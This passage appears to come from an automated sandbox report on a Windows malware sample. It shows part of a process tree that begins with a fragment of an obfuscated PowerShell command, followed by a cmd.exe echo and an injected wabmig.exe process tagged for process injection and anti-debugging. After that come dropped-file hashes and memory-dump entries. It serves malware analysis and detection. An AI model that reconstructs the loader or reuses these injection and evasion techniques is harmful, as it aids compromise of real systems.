i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2624
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2728

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      7287b216113a2e530f8269e06d25fc17

      SHA1

      13d24eb376042a1355c645fece87e2297edcc7cb

      SHA256

      e85983bc8e0bc850fb92430797d30b71e602b1a7c95649a4bc51ceb9ca793089

      SHA512

      956bd77d606b09905c03fd5dcabd2cebb0d31b29dc637dd0d6278dfcf8228aa0d44a7f8dc2b7cb2fc86ea75a75cffe4f6ba52bb497de464560592f2f6bccef76

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabB9DF.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar23B7.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Boko.Duc
      Filesize

      438KB

      MD5

      4ddea591d053049d64dfdd120458d2f7

      SHA1

      4e54f1b883e3f950b18fc74a86d64e37321b9f05

      SHA256

      e72b6eea450681f6c3bdcfdf39a76f6f3df333097b6f5c5674f47624698c8e1f

      SHA512

      734a40355738241be01b4ee84928eb9918826bad8ba0aaac52d2fc489a053eaefe54794561e372c98880f93b24e93ca80256d922d0a3ee244704c39895a391e2

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3OBGKPU12AWVVFRMIEFY.temp
      Filesize

      7KB

      MD5

      04ecb69fe9a1331f602521f0c945b1bb

      SHA1

      98b213fb81b86872f7275dc64326da9cce14a983

      SHA256

      733f898fa75a72b986d9bdaf6c3dd78d48a4a413009a6f20e26cac41171b6589

      SHA512

      ff3080c12abbf9ce8cd2b473f080407d1900d9619bdf71d99c4a1babb67f48bbca52660b91070b51f8f6324a29adae3541cbf499089c1e237b67c03c59733d68

      Download Submit

    • memory/1856-30-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1856-22-0x00000000028E0000-0x00000000028E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1856-26-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-27-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-28-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-24-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-31-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-32-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-23-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-25-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-63-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1856-20-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1856-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2672-37-0x0000000006610000-0x000000000795E000-memory.dmp

      Filesize

      19.3MB

      Download

    • memory/2728-38-0x00000000012F0000-0x000000000263E000-memory.dmp

      Filesize

      19.3MB

      Download

    • memory/2728-62-0x0000000000280000-0x00000000012E2000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2728-64-0x0000000000280000-0x00000000002C0000-memory.dmp

      Filesize

      256KB

      Download